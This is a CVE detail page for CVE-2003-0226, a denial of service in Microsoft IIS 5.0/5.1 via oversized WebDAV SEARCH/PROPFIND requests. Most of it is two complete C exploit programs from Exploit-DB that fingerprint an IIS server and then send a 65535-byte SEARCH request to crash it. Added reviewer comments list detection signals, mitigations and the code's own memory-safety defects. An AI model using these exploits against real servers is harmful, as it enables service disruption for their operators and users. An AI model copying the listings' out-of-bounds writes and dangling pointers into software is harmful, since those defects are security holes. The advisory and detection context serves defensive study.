CVE-2003-0226 : Detail

CVE-2003-0226

6.64%V3
Network
2003-05-30
02h00 +00:00
2018-10-12
17h57 +00:00

CVE Descriptions

Microsoft Internet Information Services (IIS) 5.0 and 5.1 allows remote attackers to cause a denial of service via a long WebDAV request with a (1) PROPFIND or (2) SEARCH method, which generates an error condition that is not properly handled.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 22670

Publication date : 2003-05-27 22h00 +00:00
Author : Neo1
EDB Verified : Yes

/*
 * source: https://www.securityfocus.com/bid/7735/info
 *
 * Microsoft Internet Information Services has been reported vulnerable to a
 * denial of service. When WebDAV receives excessively long requests to the
 * 'PROPFIND' or 'SEARCH' variables, the IIS service will fail. All current
 * web, FTP, and email sessions will be terminated. IIS will automatically
 * restart and normal service will resume.
 *
 * ** It has been reported that if a WebDAV request with a certain number of
 * bytes is received, the Inetinfo service will remain alive but cease serving
 * requests. This will cause the IIS server to stop serving requests until the
 * service is manually restarted.
 *
 * Reviewer notes (defensive reading of the listing below):
 *  - Traffic shape: one TCP connection to port 80 carrying "GET /" and then
 *    a body-less "SEARCH /" (server fingerprinting), followed by a second
 *    connection carrying a SEARCH request whose request-URI is a run of 'S'
 *    bytes sized from a 65535-byte buffer, plus a short DAV: searchrequest
 *    XML body. WebDAV SEARCH/PROPFIND requests with request-URIs of that
 *    order of size are what web-server and IDS logs should alert on.
 *  - Mitigation: apply the vendor security update for this CVE, disable
 *    WebDAV where it is not required, and enforce a maximum request-URL
 *    length in front of the server.
 *  - The listing is reproduced token-for-token from the page, including
 *    its own memory-safety defects and string literals exactly as they
 *    appear in the page text; the defects are flagged inline, not fixed.
 */
/* IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+ Bid: 7735 */

/* Status sentinels: ERROR is compared with socket()'s result, OK with
 * check_for_iis()'s result. */
#define ERROR -1
#define OK 1
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>

int check_for_iis();
void screw_iis();
void usage();

/* Address string copied from argv[1] and shared by both network routines.
 * NOTE(review): 15 bytes cannot hold a full dotted quad such as
 * "255.255.255.255" (15 characters) together with its terminator. */
char IP[15];

/*
 * Entry point: requires exactly one argument, runs the fingerprint check and
 * only then calls screw_iis(). Every early exit uses status 0, so the exit
 * code does not distinguish a usage error or failed check from success.
 */
int main(int argc, char *argv[])
{
    /* cout << "Hello, World!" << endl; */
    if(argc !=2) {
        usage();
        exit(0);
    }
    printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
    /* NOTE(review): unbounded copy of a command-line argument into the
     * 15-byte global above; any longer argument overruns it. */
    strcpy(IP, argv[1]);
    if(check_for_iis() != OK) {
        printf("Sorry, BAD LUCK! \n");
        exit(0);
    }
    screw_iis();
    return EXIT_SUCCESS;
}

/*
 * Fingerprints the host in IP over a single connection to port 80.
 *
 * Sends "GET /" and looks for the substring "IIS" in the reply, then sends a
 * body-less "SEARCH /" on the same socket and looks for
 * "HTTP/1.1 411 Length Required", which the listing treats as evidence that
 * the SEARCH method is accepted.
 *
 * Returns 1 (OK) when both substrings were found, 0 otherwise. Socket and
 * connect failures terminate the process with exit(0). The socket is never
 * closed in this function.
 */
int check_for_iis()
{
    int sck, flag = 1;
    struct sockaddr_in sin;
    char req[50];

    sck = socket(AF_INET, SOCK_STREAM, 0);
    if(sck == ERROR) {
        perror("Socket error ");
        exit(0);
    }
    sin.sin_port = htons(80);
    sin.sin_family = AF_INET;
    /* inet_addr() result is used unchecked, so a malformed address is not
     * rejected here. */
    sin.sin_addr.s_addr = inet_addr(IP);
    if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1) {
        perror("Connect Error ");
        exit(0);
    }
    strcpy(req, "GET / HTTP/1.0\r\n\n");
    /* NOTE(review): sizeof(req) sends all 50 bytes of the buffer; the bytes
     * after the string's terminator are uninitialised. */
    send(sck, req, sizeof(req), 0);
    /* NOTE(review): recv()'s return value is ignored and the buffer is not
     * NUL-terminated before strstr(), so the search can run past req. */
    recv(sck, req, sizeof(req), 0);
    if (strstr(req,"IIS") == NULL) {
        /* The literal below is split across two lines in the page text and
         * is reproduced as it appears there. */
        printf(" Not an IIS server! 
\n");
        flag = 0;
    }
    /* The trailing argument 40 has no matching conversion in the format
     * string and is ignored by sprintf(). */
    sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40);
    send(sck, req, sizeof(req), 0);
    recv(sck, req, sizeof(req), 0);
    if (strstr(req,"HTTP/1.1 411 Length Required") == NULL) {
        printf("METHOD SEARCH NOT ALLOWED. \n");
        flag = 0;
    }
    return(flag);
}

/*
 * Opens a second connection to port 80 on the host in IP and sends one
 * SEARCH request: a request line built from a 65535-byte buffer of 'S'
 * characters, the headers spelled in the format string below, and the XML
 * body held in content. It then reads up to 100 bytes of reply and prints a
 * verdict based only on whether the first byte of that reply buffer changed.
 *
 * NOTE(review): junk, buffer and request together place roughly 145 KB of
 * automatic storage in this frame; flag is declared but never used; the
 * socket is never closed.
 */
void screw_iis()
{
    int sck, flag = 1;
    struct sockaddr_in sin;
    char junk[100];
    char buffer[65535] ="";
    char request[80000];
    char content[] =
        "<?xml version=\"1.0\"?>\r\n"
        "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
        "<g:sql>\r\n"
        "Select \"DAV:displayname\" from scope()\r\n"
        "</g:sql>\r\n"
        "</g:searchrequest>\r\n";

    sck = socket(AF_INET, SOCK_STREAM, 0);
    if(sck == ERROR) {
        perror("Socket error ");
        exit(0);
    }
    sin.sin_port = htons(80);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(IP);
    if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1) {
        perror("Connect Error ");
        exit(0);
    }
    /* NOTE(review): index sizeof(buffer) is one element past the end of the
     * array - an out-of-bounds write. */
    buffer[sizeof(buffer)]=0x00;
    /* Fills every byte of the array with 'S', leaving no terminator inside
     * it; the "%s" conversion below therefore reads beyond the array. */
    memset(buffer,'S',sizeof(buffer));
    memset(request,0,sizeof(request));
    memset(junk,0,sizeof(junk));
    /* Format string reproduced exactly as it appears in the page text. */
    sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon tent-Length: ",buffer,IP);
    /* NOTE(review): request is both destination and a "%s" source here;
     * overlapping objects make this sprintf() call undefined. "%d" is also
     * paired with strlen()'s size_t result. */
    sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
    printf("\r\nScrewing the server... \n");
    send(sck,request,strlen(request),0);
    send(sck,content,strlen(content),0);
    recv(sck,junk,sizeof(junk),0);
    /* junk was zeroed above, so a zero first byte means nothing was
     * received. The listing reads that as the service having failed; since
     * recv()'s return value is ignored, a reset, timeout or filtered
     * connection would print the same verdict. */
    if(junk[0]==0x00) {
        printf("Server is Screwed! \r\n");
    } else {
        printf("BAD LUCK. Patched.\n");
    }
}

/* Prints the banner and the one-argument usage line. */
void usage()
{
    printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
    printf("Usage\r\n");
    printf("Screw_IIS <victim IP>\n");
}
Exploit Database EDB-ID : 35

Publication date : 2003-05-30 22h00 +00:00
Author : Shachank
EDB Verified : Yes

/*
 * Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit that
 * makes use of the vulnerability recently published by SPI dynamics
 *
 * Published on 31.05.2003
 *
 * Reviewer notes (defensive reading of the listing below):
 *  - Winsock variant of the same request pattern: two short probe
 *    connections to port 80 ("GET /" checked for "IIS/5.0", then a body-less
 *    "SEARCH /" checked for "HTTP/1.1 411 Length Required"), followed by a
 *    third connection carrying a SEARCH request whose request-URI is a run
 *    of 'S' bytes sized from a 65535-byte buffer plus a short DAV:
 *    searchrequest XML body. That sequence, and WebDAV requests with
 *    request-URIs of that order of size, are the log and IDS signals to
 *    alert on.
 *  - Mitigation: apply the vendor security update for this CVE, disable
 *    WebDAV where it is not required, and enforce a maximum request-URL
 *    length in front of the server.
 *  - The listing is reproduced token-for-token from the page, including
 *    its own defects and string literals exactly as they appear in the page
 *    text; the defects are flagged inline, not fixed.
 */
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")

/* Prints the banner. */
void graphitte()
{printf("\n********************************** ");
    printf("\n Webdav MICROSOFT IIS DoS Exploit * \n");
    printf("+++++++++++++++++++++++++++++++*\n");
    printf(" by Shachank Pandrey *\n");
    printf("*************************************\n");
}

/*
 * Probe helper: resolves host, connects to port 80, sends the string in
 * tobesent and reads up to 100 bytes of reply.
 *
 * Returns 0 when Winsock start-up or name resolution fails.
 * NOTE(review): on the normal path it returns the address of the local array
 * got, which no longer exists once the function returns; callers that read
 * through the result are using a dangling pointer.
 */
char *funk(char tobesent[100],char *host)
{
    int s;
    char got[100];
    WSADATA wsaData;
    struct hostent *yo;
    struct sockaddr_in heck;
    char lala[100];

    /* 0x0101 requests Winsock version 1.1. */
    if(WSAStartup(0x0101,&wsaData)!=0) {
        printf("error starting winsock..");
        return 0;
    }
    if ((yo = gethostbyname(host))==0){
        printf("error: can't resolve '%s'",host);
        return 0;
    }
    heck.sin_port = htons(80);
    heck.sin_family = AF_INET;
    heck.sin_addr = *((struct in_addr *)yo->h_addr);
    /* NOTE(review): both failure branches below only print a message;
     * execution continues with an unusable socket. */
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        printf("Error: Unable to create socket");
    }
    if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
        printf("Error: Cudn't Connect\r\n");
    }
    memset(lala,0,sizeof(lala));
    /* tobesent is a pointer here (array parameters decay), so
     * sizeof(tobesent) is the pointer size; the argument has no matching
     * conversion and is ignored. The copy into lala is unbounded. */
    sprintf(lala,"%s",tobesent,sizeof(tobesent));
    send(s,lala,strlen(lala),0);
    /* recv()'s return value is ignored and got is not NUL-terminated. */
    recv(s,got,100,0);
    return got;
    /* Unreachable: the statements after the return never run, so the socket
     * and the Winsock reference taken above are not released here. */
    closesocket(s);
    WSACleanup();
    printf("done.\n");
}

/*
 * Entry point: takes a host name or address as argv[1], runs the two probes
 * through funk(), and only when both match sends the long SEARCH request on
 * a new connection. It prints a verdict based on whether any reply byte was
 * received.
 *
 * NOTE(review): buffer, myrequest and the smaller arrays place roughly
 * 145 KB of automatic storage in this frame. The final return value is 1 on
 * every path that reaches the end of the function.
 */
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    int s;char mysend[100];
    char *gotme;
    char trash[100];
    struct hostent *yo;
    struct sockaddr_in heck;
    char buffer[65535] ="";
    char myrequest[80000];
    char content[] =
        "<?xml version=\"1.0\"?>\r\n"
        "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
        "<g:sql>\r\n"
        "Select \"DAV:displayname\" from scope()\r\n"
        "</g:sql>\r\n"
        "</g:searchrequest>\r\n";

    graphitte();
    if(WSAStartup(0x0101,&wsaData)!=0) {
        printf("Error :Cudn't initiate winsock!");
        return 0;
    }
    if(argc<2) {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]); exit(0);}
    if ( (yo = gethostbyname(argv[1]))==0) {
        printf("error: can't resolve '%s'",argv[1]);
        return 1;
    }

    printf("\nChecking web server %s\n",argv[1]);
    /* NOTE(review): funk() can return 0, and otherwise returns a pointer to
     * its own expired local buffer; strstr() is called on the result with no
     * check in either case. */
    gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]);
    if (strstr(gotme,"IIS/5.0") == NULL) {
        printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]);
    } else {
        printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]);
        /* The trailing argument 40 has no matching conversion and is
         * ignored by sprintf(). */
        sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40);
        gotme=(char *)funk(mysend,argv[1]);
        if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL) {
            printf("\n\r----> METHOD SEARCH ALLOWED\r\n");
        } else {
            printf("\n----> Method SEARCH not Allowed ! adios...\n");
            exit(0);
        }
        heck.sin_port = htons(80);
        heck.sin_family = AF_INET;
        heck.sin_addr = *((struct in_addr *)yo->h_addr);
        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
            printf("error: can't create socket");
            return 1;
        }
        if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){
            printf("Error:Cudn't Connect\r\n");
            return 1;
        }
        /* NOTE(review): index sizeof(buffer) is one element past the end of
         * the array - an out-of-bounds write. */
        buffer[sizeof(buffer)]=0x00;
        /* Fills every byte of the array with 'S', leaving no terminator
         * inside it; the "%s" conversion below therefore reads beyond the
         * array. */
        memset(buffer,'S',sizeof(buffer));
        memset(myrequest,0,sizeof(myrequest));
        memset(trash,0,sizeof(trash));
        /* Format string reproduced exactly as it appears in the page text. */
        sprintf(myrequest,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\ nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
        /* NOTE(review): myrequest is both destination and a "%s" source;
         * overlapping objects make this sprintf() call undefined. "%d" is
         * also paired with strlen()'s size_t result. */
        sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content));
        printf("\r\nDoSsing the server...<pray>\n");
        send(s,myrequest,strlen(myrequest),0);
        send(s,content,strlen(content),0);
        recv(s,trash,sizeof(trash),0);
        /* trash was zeroed above, so a zero first byte means nothing was
         * received. The listing reads that as the service having failed;
         * since recv()'s return value is ignored, a reset, timeout or
         * filtered connection would print the same verdict. */
        if(trash[0]==0x00) {
            printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n");
        } else
            printf("Server is prolly patched.\r\n");
        closesocket(s);
    }
    WSACleanup();
    return 1;
}
// milw0rm.com [2003-05-31]

Products Mentioned

Configuration 0

Microsoft>>Internet_information_services >> Version 5.0

References

http://marc.info/?l=ntbugtraq&m=105421243732552&w=2
Tags : mailing-list, x_refsource_NTBUGTRAQ
http://marc.info/?l=bugtraq&m=105427362724860&w=2
Tags : mailing-list, x_refsource_BUGTRAQ